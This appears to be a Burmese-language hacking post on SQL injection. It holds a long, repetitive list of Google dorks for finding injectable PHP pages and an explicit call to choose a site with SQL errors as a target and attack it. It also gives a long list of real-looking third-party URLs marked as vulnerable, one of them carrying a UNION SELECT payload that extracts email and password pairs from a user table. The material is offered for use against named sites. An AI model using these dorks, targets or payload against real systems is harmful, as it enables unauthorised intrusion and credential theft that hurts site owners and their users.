NOTIFY — generate a notification PREPARE — create a prepared query REINDEX — rebuild corrupted indexes RESET — restore the value of a run-time parameter to a default value REVOKE — remove access privileges ROLLBACK — abort the current transaction SELECT — retrieve rows from a table or view SELECT INTO — create a new table from the results of a query SET — change a run-time parameter SET CONSTRAINTS — set the constraint mode of the current transaction SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session SET TRANSACTION — set the characteristics of the current transaction SHOW — show the value of a run-time parameter START TRANSACTION — start a transaction block TRUNCATE — empty a table UNLISTEN — stop listening for a notification UPDATE — update rows of a table VACUUM — garbage-collect and optionally analyze a databasee SQL Injection မြာ အသုဵ့ၿပဳတဲ႔ အေၿခခဵေတျပဲ ရြိပါေသ့တယး... ဒီထကးမ္ာ့တဲ႔ functions ေတျအမ္ာ့ၾကီ့ရြိသလုိ ဒီထကးပုိၿပီ့နကးနဲတဲ႔ အသုဵ့ၿပဳပုဵေတျရြိပါတယး... ေလံလာတဲ႔သူေတျအေနနဲ႔ မိမိတုိ႔ကုိယးတုိငး SQL commands ေတျကုိ အရငးဆုဵ့ ကုိယးတုိငးစမး့စစးၿပီ့ မိမိတုိ႔ရဲ႕ SQL commands အသုဵ့ၿပဳမႈအရညးအခ္ငး့ကုိ ၿမငံးတငးသငံးပါတယး။ ----------------------------------------------------------------------------------------------------------------ဒီေလာကးဆိုရငး SQL Injection သေဘာတရာ့ေတျကိုနာ့လညးေလာကး်ပီထငးပါတယး။ ွနးခဵခ္ကး - အထကးပါ SQL Injection စာမ္ာ့ကို ကို BrB (planet creator)ထဵမြတိုကးရိုကးကူ့ယူထာ့ပါသညး
SQL Error ်ဖစးေနေသာ Website မ္ာ့ရြာနညး့ SQL ယိုေပါကး Vuln ရြိေနတဲံဆိုကးေတျကို Google Dork သဵံု့်ပီ့ရြာနုိငးပါတယး။Dork ဆိုတာ က္ေနားတိုံလိုအပး တဲံ Result ေတျကို တစုတေွ့ထဲမြာသီ့သီ့သနးံသနးံတူရာစု်ပီ့ရြာေပ့တဲွ ံ ကးဆိုကးရြာစာသာ့လိုံေ်ပာရမလာ့ပဲ။ က္ေနားေအာကးမြာ Dork ေတျ အမ္ာ့ႀကီ့စုေပ့ထာ့ပါတယး။ရြာ်ပီ့ SQL Error ်ဖစးေနတဲံ ဆိုကးတစးခုကို Target ထာ့ကာ ကို Brb ရဲံနညး့်ဖစး်ဖစး၊အ်ခာ့နညး့မ္ာ့်ဖစး်ဖစးနဲံ Attack လုပးနိုငးပါတယး။
Google Dork For SQL Injection
မ္ာ့စုစညး့မြဳ
by 3thic0kiddi3
inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id=
inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurltray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlpinions.php?id= inurl:spr.php?id= inurlages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurlarticipant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id=
inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id= inurlop.php?id= inurl:shopping.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:tran******.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option=
inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurlpinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurlffer.php?idf= inurl:art.php?idm= inurl:title.php?id= inur l: info.php?id= inurl : pro.php?id= inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID=
inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurltray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlpinions.php?id= inurl:spr.php?id= inurlages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurlarticipant.php?id=
inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id= inurlop.php?id= inurl:shopping.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:tran******.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurlpinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr=
inurl:rubp.php?idr= inurlffer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:shop+php?id+site:fr "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: is_writable() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: Unknown() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: pg_exec() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: mysql_query() inurl:"id=" & intext:"Warning: array_merge() inurl:"id=" & intext:"Warning: preg_match() inurl:"id=" & intext:"Warning: ilesize() inurl:"id=" & intext:"Warning: filesize() inurl:"id=" & intext:"Warning: require() inurl:index.php?id= inurl:trainers.php?id= inurl:login.asp index of:/admin/login.asp inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id=
inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id=
inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:produit.php?id=+site:fr inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id=
inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl:offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:index.php?id=
inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurltray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlpinions.php?id= inurl:spr.php?id= inurlages.php?id=
inurl:announce.php?id= inurl:clanek.php4?id= inurlarticipant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id= inurlop.php?id= inurl:shopping.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id=
inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurlpinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt=
inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurlffer.php?idf= inurl:art.php?idm= inurl:title.php?id= အထကးပါ Dork မ္ာ့ထဲမြ မိမိအဆငးေ်ပတဲံ Dork နဲံရြာ်ပီ့ စမး့သပးနိုငးပါတယး။
SQL Error (Vuln) ရြိေနေသာွကးဘးဆိုကးမ္ာ့စုစညး့မြဳ http://www.registerforevent.rs/event.php?id=1191' http://www.sedicifilm.it/games.php?id_cat3=61' http://www.adas-fusion.eu/theme.php?id=2' http://www.actforkids.com.au/news_full.php?id=111' http://www.ezskincare.com/theme.php?id=1' http://hcpoa.com/readnews.php?id=32' http://www.reallymeansounds.com/events/event.php?id=477' http://www.themackwoodgroup.com/view_product.php?id=1027120263040942700' http://www.vacancesetmontagne.fr/theme.php?id=7' http://www.inner-live.com/index.php?task=channels&action=view&channel_id=452' http://www.super-buys.co.uk/shops.php?field1=127' http://www.aportescriticos.com.ar/es/curriculum.php?id_cv=2' http://www.vainerepaoliello.com.br/curriculum.php?id=7' http://www.matamorosenred.com/ver_curriculum.php?id=23' http://ultimatehomedesign.com/news-detail.php?id=312'
http://www.firagirona.com/participant.php?id=108&cl=5634' http://www.firagirona.com/participant.php?id=62&cl=6399' http://www.ceripp.it/curriculum.php?id=1' http://www.dentistry.co.uk/news/news_detail.php?id=1442' http://lumopro.com/product.php?id=66' http://www.rogersspecialtysales.ca/show.php?id=18'' http://dinebaltimore.com/review.php?id=115' http://www.bia2.com/music-review/review.php?id=182' http://www.worldstylingtt.com/category.php?id=5' http://spokesrecords.com/releases.php?id=12' http://www.plusline.org/article.php?id=4695' http://www.wedding-cake-toppers.com.au/productinfo.php?ID=15' http://dvdholocaust.com/review.php?id=577' http://www.laserltd.ps/cat/showimg.php?id=1040' http://www.abalar.es/ampliar_material.php?id_material=11' http://www.clicfolio.com/clicfolio/curriculum.php?id=10505' http://www.fundraisingnetwork.org/cat-Games.php?id=39' http://www.f4customs.com/videos_pages.php?id=5' http://bbs.yayu.org/look.php?id=227' http://www.ngo-monitor.org/article.php?id=1564' http://www.armorysquareofsyracuse.com/main/shopping.php?id=15'
http://www.elitebicycles.com/athletes_detail.php?id=42' http://www.armorysquareofsyracuse.com/main/shopping.php?id=179' http://enpi-info.eu/main.php?id=344&id_type=2' http://dvdholocaust.com/review.php?id=289' http://www.rentray.nl/over_rentray.php?id=14' http://games.zbeng.net/game.php?id=2' http://www.rentray.nl/over_rentray.php?id=53' http://www.waukee.org/event.php?id=19' http://www.narkissosshavingoil.com/product/item.php?ID=2' http://www.themetalcircus.com/review.php?id=3096' http://www.laserltd.ps/cat/showimg.php?id=85' http://www.cedec.ca/index.php?id=1' http://www.maxprotech.com/maxpro-product-detail.php?id=48' http://www.cam-ceeds.org/event.php?ID=30' http://www.ferobrake.co.za/productdetail.php?id=19' http://www.illoomballoon.com/news.php?id=112' http://www.skbcases.com/music/news/news-detail.php?id=24' http://www.rec.org/event.php?id=286' http://www.playdowns.com/nbca/event.php?id_cmp=10' http://www.selfpp.com/gallery.php?ID=8' http://tko.sciencenoodle.com/game.php?id=60987'
http://www.dracoders.com/games.php?id=7' http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=32+' http://www.cryptoseries.fr/Fiches/fiche-serie_personnages.php?id=29+' http://www.shoppingtang.com/productinfo.php?id=294' http://www.sealchemistry.co.za/readnews.php?id=10' http://www.notebookfocus.com/readnews.php?id=343' http://www.hkyongnuo.com/e-detail.php?ID=241' http://www.bryansmarine.com/section.php?id=10' http://hcpoa.com/readnews.php?id=73' http://mappn.com/game.php?id=11' http://www.onradio.gr/player.php?id=388' http://www.vertexlaw.co.uk/news/detail.php?id=000147' http://www.wildarttaxidermy.co.uk/gallery.php?id=16' http://www.kudosshowers.co.uk/gallery.php?id=3' http://www.wildarttaxidermy.co.uk/gallery.php?id=86' http://www.scotclimb.org.uk/gallery.php?id=3' http://www.scotclimb.org.uk/gallery.php?id=83' http://www.cfnielsen.com/material.php?id=19' http://ww2.fairfaxtimes.com/cms/story.php?id=1195' http://www.bernard-vidal.com/view-photo.php?id=75' http://ww2.fairfaxtimes.com/cms/story.php?id=1050'
http://www.aoamumbai.in/publications.php?id=49' http://www.infocajeme.com/humor.php?id=12' http://www.funlandz.com/find_person.php?id=180071' http://www.gorodokboxing.com/material.php?id=2' http://www.datamp.org/patents/search/xrefPerson.php?id=6509' http://www.babycareadvice.com/babycare/general_help/article.php?id=18' http://kb.calyxsupport.com/kb/article.php?id=308' http://www.gymka.com/english/detail_produit.php?id=328' http://www.thefutureisfierce.com/releases.php?ID=49' http://www.datamp.org/patents/search/xrefPerson.php?id=7413' http://baywoodbest.com/listingPop.php?Id=620' http://www.nissi-beach.com/section.php?id=13' http://evt-me.com/newsDetail.php?id=8' http://www.bernard-vidal.com/view-photo.php?id=76' http://www.notebookfocus.com/readnews.php?id=589' http://www.istl.com/view-product.php?ID=54' http://www.fitnessbuildshealth.com/trainers.php?id=88' http://www.techvision.co.uk/news.php?id=45' http://www.guruslodge.com/index.php?topic=6484.0' http://www.fanfics.ru/read.php?id=1515' http://www.henleystandard.co.uk/news/news.php?id=36113'
http://www.facingthegiants.com/news.php?id=2' http://www.pioneer-group.co.uk/event.php?id=16' http://terekon.ru/material.php?id=6' http://www.chambers.ie/preview.php?id=889' http://www.yboaofnc.com/event.php?id=3' http://www.amandala.com.bz/newsadmin/preview.php?id=6926' http://princesspaper.com/pages/view-product.php?id=2' http://rec.org/event.php?id=306' http://www.bombasticlife.com/place/review.php?id=504' http://www.kingslynnarts.co.uk/whatson_event.php?id=46' http://www.nowgen.org.uk/facilities/events/event.php?id=30' http://www.bia2.com/music-review/review.php?id=248' http://www.walesdirectory.co.uk/events/event.php?id=2445' http://www.nowgen.org.uk/facilities/events/event.php?id=11' http://www.doggerfisher.com/artists/publications.php?id=47' https://powertraveller.com/news/detail.php?id=000126' http://www.prosportsgroup.com/agent-info.php?id=55' http://www.highlandvillage.org/event.php?id=72' http://www.edseven.com/item_look.php?id=4' http://www.nmtf.co.uk/index.php?id_cpg=1' http://www.minesandcommunities.org/look.php?id=54'
http://www.minesandcommunities.org/look.php?id=101' http://infocajeme.com/humor.php?id=38' http://www.geneticsandsociety.org/article.php?id=282' http://www.chambers.ie/preview.php?id=932' http://www.worapongengineering.com/project_pop.php?Id=32' http://www.twitney.co.uk/theme.php?id=5' http://www.anchoryachts.com/preview.php?ID=249' http://www.nsche.org.ng/communiquedetail.php?ID=3' http://www.twitney.co.uk/theme.php?id=6' http://www.feicuidao.com/jqzx_look.php?id=29' http://www1.kingsborough.edu/sub-other/sub-student/scholarshipdb/pop.php?id=331' http://www.bonsaitrees.com/gallery.php?id=7' http://www.amrproductions.nl/faq/view_faq.php?id=7' http://www.highlandvillage.org/event.php?id=7' http://reallymeansounds.com/events/event.php?id=529' http://holidayvillagerodos.com/gallery.php?id=1' http://www.schoolofbhagavadgita.org/shopping.php?id=45' http://www.ecstasydata.org/view.php?ID=1888' http://www.pialombardia4.it/newscat.php?id_newscategory=2' http://www.konceive.com.au/riverside/investAnnounce.php?id=43' http://www.bonsaitrees.com/gallery.php?id=4'
http://www.eventdirect.ca/game.php?ID=62' http://www.firagirona.com/participant.php?id=73&cl=6541' http://www.firagirona.com/participant.php?id=32&cl=10022' http://www.humanrights.uconn.edu/publications.php?id=37' http://www.sportident.co.uk/full_story.php?id=115' http://courtnews.co.nz/story.php?id=1912' http://biclopsgames.com/game.php?id=6' http://www.humanrights.uconn.edu/publications.php?id=19' http://apiexchange.com/index_main.php?id=1' http://www.hotelsayianapa.com/section.php?id=11' http://www.kipepeo.org/insect-gallery.php?id=58' http://www.fn-franchecomte.com/communique_detail.php?id=145' http://www.stonemarket.co.uk/section.php?id=1' http://www.skywatcher.com/swtinc/product.php?id=30&class1=1&class2=102' http://www.psychology.org.nz/cms_show_download.php?id=559' http://www.fn-franchecomte.com/communique_detail.php?id=29' http://www.medix.com.hr/aboutbook.php?id=30' http://thehimalayantimes.com/tgifnfw11/theme.php?id=259' http://www.excellentdevelopment.com/news_detail.php?id=136' http://www.simon-dean.co.uk/motor_news/motor_news_detail.php?ID=35' http://www.natalpress.com.br/humor.php?id=10627'
http://www.cross.tv/52818?channel_id=1104' http://www.cbmin.org/cbm/staff?staff_id=10' http://olympicresidence.com/gallery.php?id=13' http://www.ath-elite.com.au/trainers.php?id=28' http://familynewsabout.com/aboutBook.php?id=3241' http://www.mvsport-tuning.com/viewProduct.php?id=43' http://www.leadacidbatteryinfo.org/newsdetail.php?id=18' http://www.avmaniacs.com/review.php?id=1054' http://www.clicfolio.com/clicfolio/curriculum.php?id=5294' http://byeu.org/photos/viewphoto.php?ID=194' http://www.cbmin.org/cbm/staff?staff_id=6' http://www.coastal-koi.com/view_product.php?id=954' http://www.drummajorinstitute.org/events/unique_event.php?ID=38' http://www.gorodokboxing.com/material.php?id=1' http://www.ldschurchtemples.com/sandiego/gallery/download.php?id=272' http://www.dvdmaniacs.net/review.php?id=318' http://www.themarketingsite.com/live/content.php?Item_ID=5925' http://www.dmgems.co.uk/pages.php?id_sec=15' http://www.faithinplace.org/news.php?ID=58' http://www.barcode.md/post.php?id=20' http://www.sheridan-uk.com/news_detail.php?id=52'
http://www.individualcars.com/inventory/detail.php?ID=685' http://www.bsp.org.uk/news_full.php?id=31' http://www.amandala.com.bz/newsadmin/preview.php?id=28' http://flatbearconsulting.com/pages.php?id_pag=6' http://www.girls.njpanthers.com/preview.php?id=25' http://www.hotproperties-bayarea.com/readnews.php?id=2' http://www.dmgems.co.uk/pages.php?id_sec=2' http://www.shxingba.com/product/prodinfo.php?id=62' http://www.cheap-web-hosting-info.com/hosting_review.php?id=8' http://inrecs.com/releases.php?id=37' http://www.planetbollywood.com/displayReview.php?id=m101411095354' http://techloopreviews.com/review.php?id=89' http://www.rentray.nl/over_rentray.php?id=11' http://dailyexhibit.com/theme.php?id=1224 ForceRecrawl: 0' http://www.rentray.nl/over_rentray.php?id=12' http://yoga.ge/pages/theme.php?id=109' http://www.vertexlaw.co.uk/news/detail.php?id=000083' http://terekon.ru/material.php?id=1' http://www.ristorantelarsenale.com/newscat.php?id_newscategory=2' http://www.thejewishmuseum.org/site/pages/event.php?id=348' http://www.peterduff.com/main.php?ID=1'
http://www.sagemont.com/class_pages.php?id=940170' http://www.nutritioncare.net/pages.php?id=12' http://www.therightdentist.com/profileview.php?id=124859' http://www.oceansurf.ca/gallery.php?id=16' http://www.individualcars.com/inventory/detail.php?ID=604' http://www.gtamodding.it/area/index.php?act=view&id=34+...%2F%2Ftrainers.php%3Fid%3D41+union+select+0%2C1%2C2%2Cconcat%28email%2C0x3a%2Cpass%29%2C4%2C5%2C6% 2C7%2C8+f rom+koobi_user' http://www.craftaustralia.org.au/library/review.php?id=blurring_the_boundaries' http://www.luimo.org/curriculum.php?id=ST000019' http://www.djangosolos.com/title.php?id=128' http://www.kagakribet.com/humor.php?id=157' http://fitnessbuildshealth.com/trainers.php?id=32' http://www.portalararuna.com.br/2011/humor.php?id=10' http://www.plusline.org/article.php?id=6068' http://gp.org/speakers/detail.php?ID=42' http://www.glac.fr/en/produit.php?id=84' http://www.glac.fr/en/produit.php?id=98' http://www.thefutureisfierce.com/releases.php?ID=25' http://internal.ccuniversity.edu/ministryjobboard/post.php?ID=5242' http://www.trailercityportland.com/product.php?id=559'
